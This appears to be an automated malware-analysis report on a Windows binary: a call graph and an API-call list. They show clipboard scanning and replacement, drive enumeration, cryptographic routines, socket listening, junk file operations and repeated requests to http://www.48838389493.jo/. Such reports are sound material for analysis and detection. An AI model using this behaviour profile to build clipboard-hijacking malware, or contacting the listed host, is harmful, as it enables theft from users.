6430->6434 6433 77ecc9 6433->6355 6509 773610 InitializeCriticalSection 6434->6509 6435 77ec96 6435->6433 6553 77ed30 6435->6553 6438->6433 6438->6435 6548 77ed00 6438->6548 6439 77ec1e 6441 77ec3b 6439->6441 6511 77e780 6439->6511 6547 7735f0 LeaveCriticalSection 6441->6547 7000 77ef90 6445->7000 6448 781341 6448->6355 6449 78122e GetTempPathW 6451 78125e 6449->6451 6461 781320 6449->6461 6452 78126e rand rand wsprintfW 6451->6452 6451->6461 7004 781130 CreateFileW 6452->7004 6455 7812e8 Sleep 6456 77fe60 24 API calls 6455->6456 6457 7812ff 6456->6457 6458 781309 Sleep 6457->6458 6459 781325 DeleteFileW 6457->6459 6460 780080 7 API calls 6458->6460 6459->6461 6460->6461 7011 77efe0 6461->7011 6463 77eed6 6462->6463 6464 77ef81 6462->6464 7067 7735d0 EnterCriticalSection 6463->7067 6464->6350 6466 77eee1 6467 77ef61 6466->6467 7068 77eb20 6466->7068 6467->6464 7072 7735f0 LeaveCriticalSection 6467->7072 6471 77ef1a 6471->6467 6473 77ed30 codecvt 2 API calls 6471->6473 6472 77ed00 codecvt 5 API calls 6472->6471 6473->6467 6474->6378 6476 780076 6475->6476 6477 77fe98 CreateFileW 6475->6477 6476->6421 6476->6422 6478 78006c CryptDestroyKey 6477->6478 6479 77febe GetFileSize 6477->6479 6478->6476 6480 77fed7 CreateFileMappingA 6479->6480 6481 780062 CloseHandle 6479->6481 6482 78003e 6480->6482 6483 77fef8 MapViewOfFile 6480->6483 6481->6478 6482->6481 6484 780046 SetFilePointer SetEndOfFile 6482->6484 6485 77ff17 6483->6485 6486 780034 CloseHandle 6483->6486 6484->6481 6487 78002a UnmapViewOfFile 6485->6487 6488 77ff42 CryptCreateHash 6485->6488 6486->6482 6487->6486 6488->6487 6489 77ff64 GetProcessHeap HeapAlloc 6488->6489 6489->6487 6490 77ffa7 6489->6490 6496 77fd80 6490->6496 6493 77ffde CryptVerifySignatureA 6494 780017 GetProcessHeap HeapFree 6493->6494 6495 77ffff memcpy 6493->6495 6494->6487 6495->6494 6497 77fdbe memcpy memcpy CryptImportKey 6496->6497 6499 77fe56 CryptHashData 6497->6499 6500 77fe21 CryptEncrypt CryptDestroyKey 6497->6500 6499->6493 6499->6494 6500->6499 6502 77da4f 6501->6502 6558 773610 InitializeCriticalSection 6502->6558 6504 77da93 6559 77db60 6504->6559 6508 77daaf 6508->6430 6509->6428 6510->6439 6512 77ea05 6511->6512 6513 77e7a3 6511->6513 6512->6441 6574 779080 6513->6574 6516 77e7bd WSAStartup 6516->6512 6517 77e7d7 6516->6517 6651 7735b0 GetProcessHeap 6517->6651 6519 77e7dc 6520 77e9f4 6519->6520 6652 773c60 6519->6652 6520->6512 6521 77e9ff WSACleanup 6520->6521 6521->6512 6526 77e807 CreateIoCompletionPort 6528 77e9d4 6526->6528 6529 77e834 6526->6529 6527 77e9e4 6527->6520 6726 773e00 6527->6726 6528->6527 6721 772250 6528->6721 6682 777800 memmove 6529->6682 6533 77e85b 6683 7735d0 EnterCriticalSection 6533->6683 6535 77e86c 6684 77e5c0 6535->6684 6537 77e87f 6702 778e30 socket 6537->6702 6539 77e987 6540 77e9a5 6539->6540 6541 77e5c0 70 API calls 6539->6541 6720 7735f0 LeaveCriticalSection 6540->6720 6541->6540 6543 77e9b6 6543->6528 6545 77e9c1 CloseHandle 6543->6545 6544 77e894 6544->6539 6717 778fd0 6544->6717 6545->6528 6547->6438 6965 77ed60 6548->6965 6550 77ed0f 6551 77ed17 ??3@YAXPAX 6550->6551 6552 77ed23 6550->6552 6551->6552 6552->6435 6999 773630 DeleteCriticalSection 6553->6999 6555 77ed3f 6556 77ed47 ??3@YAXPAX 6555->6556 6557 77ed53 6555->6557 6556->6557 6557->6433 6558->6504 6567 77db90 6559->6567 6562 77db90 InitializeCriticalSection 6563 77db7d 6562->6563 6564 77db90 InitializeCriticalSection 6563->6564 6565 77daa1 6564->6565 6566 773610 InitializeCriticalSection 6565->6566 6566->6508 6570 783f50 6567->6570 6573 773610 InitializeCriticalSection 6570->6573 6572 77db72 6572->6562 6573->6572 6730 779030 LoadLibraryA 6574->6730 6577 779030 2 API calls 6578 7790c4 6577->6578 6579 779030 2 API calls 6578->6579 6580 7790db 6579->6580 6581 779030 2 API calls 6580->6581 6582 7790f2 6581->6582 6583 779030 2 API calls 6582->6583 6584 779109 6583->6584 6585 779030 2 API calls 6584->6585 6586 779120 6585->6586 6587 779030 2 API calls 6586->6587 6588 779137 6587->6588 6589 779030 2 API calls 6588->6589 6590 77914e 6589->6590 6591 779030 2 API calls 6590->6591 6592 779165 6591->6592 6593 779030 2 API calls 6592->6593 6594 77917c 6593->6594 6595 779030 2 API calls 6594->6595 6596 779193 6595->6596 6597 779030 2 API calls 6596->6597 6598 7791aa 6597->6598 6599 779030 2 API calls 6598->6599 6600 7791c1 6599->6600 6601 779030 2 API calls 6600->6601 6602 7791d8 6601->6602 6603 779030 2 API calls 6602->6603 6604 7791ef 6603->6604 6605 779030 2 API calls 6604->6605 6606 779206 6605->6606 6607 779030 2 API calls 6606->6607 6608 77921d 6607->6608 6609 779030 2 API calls 6608->6609 6610 779234 6609->6610 6611 779030 2 API calls 6610->6611 6612 77924b 6611->6612 6613 779030 2 API calls 6612->6613 6614 779262 6613->6614 6615 779030 2 API calls 6614->6615 6616 779279 6615->6616 6617 779030 2 API calls 6616->6617 6618 779290 6617->6618 6619 779030 2 API calls 6618->6619 6620 7792a7 6619->6620 6621 779030 2 API calls 6620->6621 6622 7792be 6621->6622 6623 779030 2 API calls 6622->6623 6624 7792d5 6623->6624 6625 779030 2 API calls 6624->6625 6626 7792ec 6625->6626 6627 779030 2 API calls 6626->6627 6628 779303 6627->6628 6629 779030 2 API calls 6628->6629 6630 77931a 6629->6630 6631 779030 2 API calls 6630->6631 6632 779331 6631->6632 6633 779030 2 API calls 6632->6633 6634 779348 6633->6634 6635 779030 2 API calls 6634->6635 6636 77935f 6635->6636 6637 779030 2 API calls 6636->6637 6638 779376 6637->6638 6639 779030 2 API calls 6638->6639 6640 77938d 6639->6640 6641 779030 2 API calls 6640->6641 6642 7793a4 6641->6642 6643 779030 2 API calls 6642->6643 6644 7793bb 6643->6644 6645 779030 2 API calls 6644->6645 6646 7793d2 6645->6646 6647 779030 2 API calls 6646->6647 6648 7793e9 6647->6648 6649 779030 2 API calls 6648->6649 6650 779400 6649->6650 6650->6512 6650->6516 6651->6519 6653 773c82 6652->6653 6733 773330 6653->6733 6656 773dd9 6656->6520 6667 772120 6656->6667 6658 773cd8 6740 773ac0 6658->6740 6661 773d85 6664 773d91 GetSystemTimeAsFileTime 6661->6664 6662 773dec 6746 7733c0 6662->6746 6665 773dcd 6664->6665 6744 773bf0 GetTickCount 6665->6744 6750 772100 memmove 6667->6750 6669 77213f 6751 772100 memmove 6669->6751 6671 772152 6752 772100 memmove 6671->6752 6673 772165 memmove 6674 7721b0 6673->6674 6675 7721c2 CryptAcquireContextA 6674->6675 6676 772242 6675->6676 6677 7721e8 CryptAcquireContextA 6675->6677 6676->6526 6676->6527 6678 772204 6677->6678 6679 772229 6677->6679 6678->6679 6681 77221a CryptReleaseContext 6678->6681 6679->6676 6680 772234 CryptReleaseContext 6679->6680 6680->6676 6681->6679 6682->6533 6683->6535 6753 7735d0 EnterCriticalSection 6684->6753 6686 77e760 6768 7735f0 LeaveCriticalSection 6686->6768 6688 77e5db 6688->6686 6690 77e64f 6688->6690 6689 77e773 6689->6537 6691 77e6bd 6690->6691 6692 77e6c2 6690->6692 6693 77e699 6690->6693 6701 77e758 6691->6701 6765 773c20 6691->6765 6692->6691 6757 7796d0 6692->6757 6754 7771f0 6693->6754 6697 7771f0 2 API calls 6697->6691 6700 7771f0 2 API calls 6700->6701 6701->6537 6703 778fbc 6702->6703 6704 778e58 setsockopt 6702->6704 6703->6544 6962 773310 6704->6962 6706 778e84 htons htonl bind 6707 778ec7 listen 6706->6707 6716 778f74 6706->6716 6709 778ede getsockname 6707->6709 6707->6716 6708 778faf closesocket 6708->6703 6710 778f02 6709->6710 6709->6716 6963 772100 memmove 6710->6963 6712 778f12 6964 772100 memmove 6712->6964 6714 778f25 htons 6715 778f47 htons 6714->6715 6715->6716 6716->6703 6716->6708 6718 778fe1 closesocket 6717->6718 6719 778fed WaitForSingleObject TerminateThread CloseHandle 6717->6719 6718->6719 6719->6539 6720->6543 6722 77225c CryptReleaseContext 6721->6722 6723 77226a 6721->6723 6722->6723 6724 772273 CryptReleaseContext 6723->6724 6725 772282 6723->6725 6724->6725 6725->6527 6727 773e0f 6726->6727 6728 7733c0 task HeapFree 6727->6728 6729 773e19 6728->6729 6729->6520 6731 779067 6730->6731 6732 779050 GetProcAddress 6730->6732 6731->6577 6732->6731 6734 773344 6733->6734 6735 7733aa 6734->6735 6736 773361 HeapAlloc 6734->6736 6737 77337b HeapReAlloc 6734->6737 6738 77339d Sleep 6734->6738 6735->6656 6739 772100 memmove 6735->6739 6736->6734 6737->6734 6738->6734 6739->6658 6741 773ace 6740->6741 6742 773ac9 6740->6742 6741->6742 6743 773ae5 lstrcpynA 6741->6743 6742->6661 6742->6662 6743->6742 6745 773c04 6744->6745 6745->6656 6747 7733ee 6746->6747 6748 7733c9 6746->6748 6747->6656 6748->6747 6749 7733d1 HeapFree 6748->6749 6749->6747 6750->6669 6751->6671 6752->6673 6753->6688 6755 77723e 6754->6755 6756 7771fc setsockopt closesocket 6754->6756 6755->6697 6756->6755 6758 779700 6757->6758 6759 779723 6758->6759 6760 7771f0 2 API calls 6758->6760 6772 77bab0 6759->6772 6762 779718 6760->6762 6769 7798d0 6762->6769 6764 77972f 6764->6691 6766 773b80 GetTickCount 6765->6766 6767 773c28 6766->6767 6767->6700 6767->6701 6768->6689 6778 773b80 GetTickCount 6769->6778 6771 7798dc 6771->6759 6773 77bac9 6772->6773 6777 77bb21 6772->6777 6776 77bae3 6773->6776 6780 77a850 6773->6780 6776->6777 6785 7799a0 6776->6785 6777->6764 6779 773b99 6778->6779 6779->6771 6795 779f90 6780->6795 6784 77a892 6784->6776 6786 7799ba 6785->6786 6955 7728f0 6786->6955 6788 7799c6 6789 7728f0 CryptDestroyKey 6788->6789 6790 7799d5 6789->6790 6791 7799ed 6790->6791 6958 772b20 6790->6958 6793 779a05 6791->6793 6794 772b20 CryptDestroyHash 6791->6794 6793->6776 6794->6793 6796 779fba 6795->6796 6797 77a016 6796->6797 6798 779fe6 htons htons 6796->6798 6800 77a023 6797->6800 6803 77a0cf 6797->6803 6799 77a0db 6798->6799 6799->6784 6852 779b70 6799->6852 6801 773b80 GetTickCount 6800->6801 6802 77a028 htonl memmove memmove 6801->6802 6802->6799 6803->6799 6804 77a118 6803->6804 6807 77a175 6803->6807 6856 772b60 6804->6856 6807->6799 6809 77a1fa 6807->6809 6811 77a2c6 6807->6811 6810 772b60 6 API calls 6809->6810 6851 77a2c1 6809->6851 6812 77a216 6810->6812 6814 77a365 6811->6814 6815 77a313 6811->6815 6811->6851 6816 77a224 inet_pton 6812->6816 6812->6851 6818 77a3c1 6814->6818 6819 77a36e 6814->6819 6817 77a31c htons memmove 6815->6817 6815->6851 6820 77a245 htons 6816->6820 6816->6851 6817->6851 6821 77a610 6818->6821 6822 77a3ce 6818->6822 6892 7722b0 CryptGenRandom 6819->6892 6824 77b110 27 API calls 6820->6824 6829 77a62b 6821->6829 6830 77a71a 6821->6830 6821->6851 6825 772b60 6 API calls 6822->6825 6827 77a28a 6824->6827 6828 77a466 6825->6828 6826 77a381 6831 77a38b memmove 6826->6831 6826->6851 6832 77a291 memmove 6827->6832 6827->6851 6828->6851 6893 772920 6828->6893 6833 77a637 inet_pton 6829->6833 6838 77a658 lstrlenA 6829->6838 6835 77a73e 6830->6835 6836 77a779 6830->6836 6830->6851 6831->6851 6832->6851 6833->6838 6837 77a74a memmove 6835->6837 6835->6851 6841 77a78e memmove 6836->6841 6836->6851 6837->6851 6838->6851 6841->6851 6842 773b80 GetTickCount 6843 77a4ae htonl inet_pton 6842->6843 6844 77a4e2 htons memmove 6843->6844 6843->6851 6900 772340 lstrlenA 6844->6900 6847 77a53f htons memmove memmove 6848 77b110 27 API calls 6847->6848 6849 77a5e1 6848->6849 6906 773410 6849->6906 6851->6799 6910 779e80 6851->6910 6853 779b83 6852->6853 6854 779bcc htons 6852->6854 6853->6854 6855 779be2 6853->6855 6854->6855 6855->6784 6918 773310 6856->6918 6858 772b7e memmove memmove 6919 7722b0 CryptGenRandom 6858->6919 6860 772bfd 6861 772c07 CryptImportKey 6860->6861 6862 772c7f 6860->6862 6861->6862 6863 772c29 CryptExportKey 6861->6863 6862->6799 6866 77b110 6862->6866 6920 7722d0 6863->6920 6867 773330 _longjmp 3 API calls 6866->6867 6868 77b133 6867->6868 6869 77b143 memmove memmove 6868->6869 6877 77b2d0 6868->6877 6922 772570 6869->6922 6872 77b196 memmove 6926 7723c0 CryptEncrypt 6872->6926 6873 77b1d1 6876 773330 _longjmp 3 API calls 6873->6876 6874 7733c0 task HeapFree 6874->6877 6879 77b1f7 6876->6879 6877->6799 6878 77b1c6 6938 7725a0 6878->6938 6879->6878 6928 7722b0 CryptGenRandom 6879->6928 6882 77b2c4 6882->6874 6883 77b212 6884 77b220 memmove memmove 6883->6884 6885 77b2af 6883->6885 6887 7723c0 CryptEncrypt 6884->6887 6886 7733c0 task HeapFree 6885->6886 6886->6878 6888 77b263 6887->6888 6888->6885 6929 772850 6888->6929 6891 77b29b memmove 6891->6885 6892->6826 6894 772340 6 API calls 6893->6894 6895 772937 6894->6895 6899 772961 6895->6899 6941 772b40 6895->6941 6898 773410 HeapFree 6898->6899 6899->6842 6899->6851 6901 77235d 6900->6901 6905 7723b0 6900->6905 6944 7734a0 6901->6944 6903 77236a 6904 773410 HeapFree 6903->6904 6903->6905 6904->6905 6905->6847 6905->6851 6907 77341c 6906->6907 6908 773428 _longjmp 6906->6908 6909 7733c0 task HeapFree 6907->6909 6908->6851 6909->6908 6912 779e9a 6910->6912 6911 779f81 6911->6799 6912->6911 6913 779ee2 htons 6912->6913 6948 772af0 6913->6948 6916 779f4d memmove 6951 779c60 6916->6951 6918->6858 6919->6860 6921 7722dc CryptDestroyKey 6920->6921 6921->6862 6923 772583 6922->6923 6924 7724b0 9 API calls 6923->6924 6925 772593 6924->6925 6925->6872 6925->6873 6925->6882 6927 7723ec 6926->6927 6927->6878 6928->6883 6930 772863 6929->6930 6931 7728bc 6930->6931 6932 772680 7 API calls 6930->6932 6931->6885 6931->6891 6933 77287e 6932->6933 6934 7728ad 6933->6934 6935 772888 memmove 6933->6935 6937 7728f0 CryptDestroyKey 6934->6937 6936 772770 memmove CryptEncrypt 6935->6936 6936->6934 6937->6931 6939 7725b7 6938->6939 6940 7725ab CryptDestroyKey 6938->6940 6939->6882 6940->6939 6942 772a70 8 API calls 6941->6942 6943 772952 6942->6943 6943->6898 6945 7734ac _longjmp 6944->6945 6946 773440 _longjmp HeapAlloc HeapReAlloc Sleep Sleep 6945->6946 6947 7734bc 6946->6947 6947->6903 6949 7729f0 CryptHashData CryptDuplicateHash CryptGetHashParam CryptDestroyHash 6948->6949 6950 772b0f 6949->6950 6950->6911 6950->6916 6954 779c76 6951->6954 6952 779cbd 6952->6911 6953 772770 memmove CryptEncrypt 6953->6954 6954->6952 6954->6953 6956 772907 6955->6956 6957 7728fb CryptDestroyKey 6955->6957 6956->6788 6957->6956 6961 772a60 CryptDestroyHash 6958->6961 6960 772b2e 6960->6791 6961->6960 6962->6706 6963->6712 6964->6714 6972 773630 DeleteCriticalSection 6965->6972 6967 77ed75 6973 77ee70 6967->6973 6971 77ed91 codecvt 6971->6550 6972->6967 6981 77eea0 6973->6981 6976 77eea0 codecvt 4 API calls 6977 77ee8d 6976->6977 6978 77eea0 codecvt 4 API calls 6977->6978 6979 77ed83 6978->6979 6980 773630 DeleteCriticalSection 6979->6980 6980->6971 6984 783f80 6981->6984 6989 784030 6984->6989 6988 77ee82 6988->6976 6997 7735d0 EnterCriticalSection 6989->6997 6991 78403f 6992 7733c0 task HeapFree 6991->6992 6994 784054 6991->6994 6992->6994 6998 7735f0 LeaveCriticalSection 6994->6998 6995 783f8f 6996 773630 DeleteCriticalSection 6995->6996 6996->6988 6997->6991 6998->6995 6999->6555 7001 77efbc 7000->7001 7002 77efa2 7000->7002 7001->6448 7001->6449 7001->6461 7015 7762e0 7002->7015 7005 781162 SetFilePointer 7004->7005 7006 7811d3 7004->7006 7007 781180 WriteFile 7005->7007 7006->6455 7006->6461 7008 7811a2 7007->7008 7009 7811a4 7007->7009 7010 7811bb CloseHandle 7008->7010 7009->7007 7009->7010 7010->7006 7012 77eff0 7011->7012 7013 77eff9 7011->7013 7014 773410 HeapFree 7012->7014 7013->6448 7014->7013 7016 7762ed _longjmp 7015->7016 7052 772100 memmove 7016->7052 7018 776329 7053 772100 memmove 7018->7053 7020 77633c 7054 772100 memmove 7020->7054 7022 77634f 7055 772100 memmove 7022->7055 7024 776362 7025 77637d 7024->7025 7026 77636b lstrlenA 7024->7026 7027 776725 7025->7027 7028 77639d SetLastError 7025->7028 7026->7025 7031 77679d 7027->7031 7032 773410 HeapFree 7027->7032 7029 7763bd 7028->7029 7030 7763ab lstrlenA 7028->7030 7033 776405 7029->7033 7034 776773 GetLastError 7029->7034 7030->7029 7031->7001 7032->7031 7035 77640b lstrlenA 7033->7035 7036 77641d lstrlenA 7033->7036 7034->7027 7035->7036 7038 776566 7036->7038 7039 77674e GetLastError 7038->7039 7043 776573 7038->7043 7039->7027 7040 776597 7041 776737 GetLastError 7040->7041 7042 7765d7 7040->7042 7041->7027 7045 77672a GetLastError 7042->7045 7046 776602 _longjmp 7042->7046 7043->7040 7056 7734d0 7043->7056 7045->7027 7046->7027 7047 7734a0 _longjmp 4 API calls 7046->7047 7048 7766a1 7047->7048 7048->7027 7049 7766ed 7048->7049 7050 773410 HeapFree 7048->7050 7049->7027 7051 773410 HeapFree 7049->7051 7050->7049 7051->7027 7052->7018 7053->7020 7054->7022 7055->7024 7059 7734da 7056->7059 7057 77352d memmove 7058 7734ea 7057->7058 7058->7043 7059->7057 7059->7058 7062 773440 7059->7062 7063 77344d 7062->7063 7064 773330 _longjmp 3 API calls 7063->7064 7065 773476 Sleep 7063->7065 7066 773469 7063->7066 7064->7063 7065->7063 7065->7066 7066->7057 7066->7058 7067->6466 7069 77eb42 7068->7069 7070 77eb73 7069->7070 7071 77eb4e WaitForSingleObject TerminateThread CloseHandle 7069->7071 7070->6471 7070->6472 7071->7070 7072->6464 7074 77fcd6 OpenClipboard 7073->7074 7075 77fce2 GetClipboardData 7074->7075 7076 77fd5c Sleep 7074->7076 7077 77fcf3 GlobalLock 7075->7077 7078 77fd1c GetClipboardData 7075->7078 7076->7074 7077->7078 7079 77fd06 GlobalUnlock 7077->7079 7080 77fd56 CloseClipboard 7078->7080 7081 77fd2d GlobalLock 7078->7081 7096 77f660 strlen 7079->7096 7080->7076 7081->7080 7083 77fd40 GlobalUnlock 7081->7083 7124 77f010 wcslen 7083->7124 7166 7801e0 _wfopen fseek ftell fclose 7087->7166 7089 781115 ExitThread 7091 781105 Sleep 7093 781025 7091->7093 7093->7089 7093->7091 7094 781092 GetVolumeInformationW 7093->7094 7095 780b30 47 API calls 7093->7095 7167 780870 GetLogicalDrives 7093->7167 7173 780790 7093->7173 7094->7093 7095->7093 7108 77f68b 7096->7108 7099 77fc90 _mbsstr 7101 77f84a 7099->7101 7100 77fc90 _mbsstr 7102 77f8e1 7100->7102 7103 77fc90 _mbsstr 7101->7103 7104 77f7f7 7101->7104 7105 77f942 isalpha 7102->7105 7107 77f7e5 7102->7107 7109 77f97a 7102->7109 7103->7104 7104->7100 7104->7107 7105->7102 7106 77f958 isdigit 7105->7106 7106->7102 7106->7107 7107->7078 7108->7104 7108->7107 7152 77fc90 7108->7152 7110 77fc90 _mbsstr 7109->7110 7111 77faff 7110->7111 7112 77fc90 _mbsstr 7111->7112 7113 77fb1b 7112->7113 7114 77fc90 _mbsstr 7113->7114 7115 77fb49 7114->7115 7116 77fc90 _mbsstr 7115->7116 7119 77fbcc 6 API calls 7115->7119 7117 77fb94 7116->7117 7121 77fc90 _mbsstr 7117->7121 7119->7107 7120 77fc6e EmptyClipboard SetClipboardData CloseClipboard 7119->7120 7120->7107 7122 77fbb0 7121->7122 7123 77fc90 _mbsstr 7122->7123 7123->7119 7125 77f03b 7124->7125 7126 77f195 7125->7126 7133 77f1a7 7125->7133 7156 77f640 wcsstr 7125->7156 7126->7080 7128 77f1cd 7128->7133 7157 77f640 wcsstr 7128->7157 7131 77f1fa 7131->7133 7158 77f640 wcsstr 7131->7158 7133->7126 7159 77f640 wcsstr 7133->7159 7134 77f291 7134->7126 7135 77f2f5 iswalpha 7134->7135 7137 77f32f 7134->7137 7135->7134 7136 77f30c iswdigit 7135->7136 7136->7126 7136->7134 7160 77f640 wcsstr 7137->7160 7139 77f4b4 7161 77f640 wcsstr 7139->7161 7141 77f4d0 7162 77f640 wcsstr 7141->7162 7143 77f4fe 7147 77f581 6 API calls 7143->7147 7163 77f640 wcsstr 7143->7163 7145 77f549 7164 77f640 wcsstr 7145->7164 7147->7126 7148 77f622 EmptyClipboard SetClipboardData CloseClipboard 7147->7148 7148->7126 7150 77f565 7165 77f640 wcsstr 7150->7165 7155 77fcb0 _mbsstr 7152->7155 7154 77f81d 7154->7099 7154->7104 7155->7154 7156->7128 7157->7131 7158->7133 7159->7134 7160->7139 7161->7141 7162->7143 7163->7145 7164->7150 7165->7147 7166->7093 7171 78089d 7167->7171 7168 7808ac RegOpenKeyExW 7170 7808ce RegQueryValueExW 7168->7170 7168->7171 7169 780916 7169->7093 7170->7171 7172 78090a RegCloseKey 7170->7172 7171->7168 7171->7169 7171->7172 7172->7171 7174 7807e9 7173->7174 7175 7807ac 7173->7175 7174->7093 7179 7807f0 GetDriveTypeW 7175->7179 7178 7807db lstrcpyW 7178->7174 7180 780818 7179->7180 7181 7807cf 7179->7181 7180->7181 7182 78082c QueryDosDeviceW 7180->7182 7181->7174 7181->7178 7182->7181 7183 780846 StrCmpNW 7182->7183 7183->7181
              APIs
              • Sleep.KERNELBASE(000007D0,?,?,?,007843AE,00000000,?,0000000A), ref: 00781374
              • FindWindowA.USER32(f5d4s54s4sds5d5d5d,00000000), ref: 007813A7
              • Sleep.KERNEL32(0000C350), ref: 007813C5
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007813D0
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007813E0
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 00781414
              • Sleep.KERNEL32(00000FA0), ref: 0078141F
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 0078142A
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 0078143A
              • Sleep.KERNEL32(00000FA0), ref: 00781445
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 00781450
              • Sleep.KERNEL32(00002710), ref: 0078145D
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781468
              • Sleep.KERNEL32(00001770), ref: 00781473
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781483
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 0078148E
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 0078149E
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007814A9
              • Sleep.KERNEL32(00000BB8), ref: 007814B4
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007814BF
              • Sleep.KERNEL32(00000BB8), ref: 007814CA
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007814DA
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 007814ED
              • DeleteFileW.KERNEL32(w4twywyw4yw4yw4yw4y), ref: 007814FE
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781516
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781526
              • Sleep.KERNEL32(00001388), ref: 00781531
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 0078153C
              • Sleep.KERNEL32(00000BB8), ref: 00781547
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781552
              • InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 0078156C
              • Sleep.KERNEL32(000007D0), ref: 0078157D
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007815BD
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007815C8
              • Sleep.KERNEL32(000007D0), ref: 007815D3
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007815E3
              • Sleep.KERNEL32(00000FA0), ref: 007815EE
              • DeleteFileA.KERNEL32(f5d4s54s4sds5d5d5d), ref: 007815F9
              • InternetCloseHandle.WININET(00000000), ref: 00781608
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 00781613
              • Sleep.KERNEL32(00001B58), ref: 0078161E
              • InternetCloseHandle.WININET(00000000), ref: 0078162B
              • Sleep.KERNEL32(00002710), ref: 00781636
              • ShowWindow.USER32(00000000,00000001), ref: 00781645
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781650
              • SetForegroundWindow.USER32(00000000), ref: 0078165D
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781668
              • CloseWindow.USER32(00000000), ref: 00781675
              • MoveFileA.KERNEL32(f5d4s54s4sds5d5d5d,3r3hr8h38h8h38f8hff), ref: 00781685
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007816CB
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007816D6
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007816E6
              • Sleep.KERNEL32(000007D0), ref: 007816F1
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007816FC
              • DeleteFileA.KERNEL32(3r3hr8h38h8h38f8hff), ref: 00781707
              • FindWindowA.USER32(3rvr3r3bru3urbu3rbub,00000000), ref: 00781714
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0078172D
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781750
              • Sleep.KERNEL32(000007D0), ref: 0078175B
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 0078176B
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781776
              • InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 00781790
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007817AF
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007817BA
              • Sleep.KERNEL32(00001388), ref: 007817C5
              • MoveFileW.KERNEL32(w4yw4t4tw4twyw4y,e5u5eue5ue5ue5ue5u), ref: 007817D5
              • MoveFileA.KERNEL32(w4tw84thw4h8th8w4h8t,f5d4s54s4sds5d5d5d), ref: 007817E5
              • Sleep.KERNEL32(00000FA0), ref: 007817F0
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 007817FB
              • InternetCloseHandle.WININET(00000000), ref: 00781808
              • Sleep.KERNEL32(00000DAC), ref: 00781813
              • InternetCloseHandle.WININET(00000000), ref: 00781820
              • Sleep.KERNEL32(00001388), ref: 0078182B
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 00781848
              • ShowWindow.USER32(00000000,00000000), ref: 00781857
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781862
              • SetForegroundWindow.USER32(00000000), ref: 0078186F
              • Sleep.KERNEL32(00000DAC), ref: 0078187A
              • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0078188D
              • InternetOpenUrlA.WININET(00000000,http://www.48838389493.jo/,00000000,00000000,00000000,00000000), ref: 007818BA
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 007818D4
              • MoveFileW.KERNEL32(w4tw4yw4yw4tw4t,e5u5eue5ue5ue5ue5u), ref: 007818E4
              • Sleep.KERNEL32(00000BB8), ref: 007818EF
              • DeleteFileW.KERNEL32(w4yw4t4tw4twyw4y), ref: 007818FA
              • InternetCloseHandle.WININET(00000000), ref: 00781907
              • DeleteFileW.KERNEL32(w4tw4yw4yw4tw4t), ref: 00781912
              • Sleep.KERNEL32(00000064), ref: 0078191A
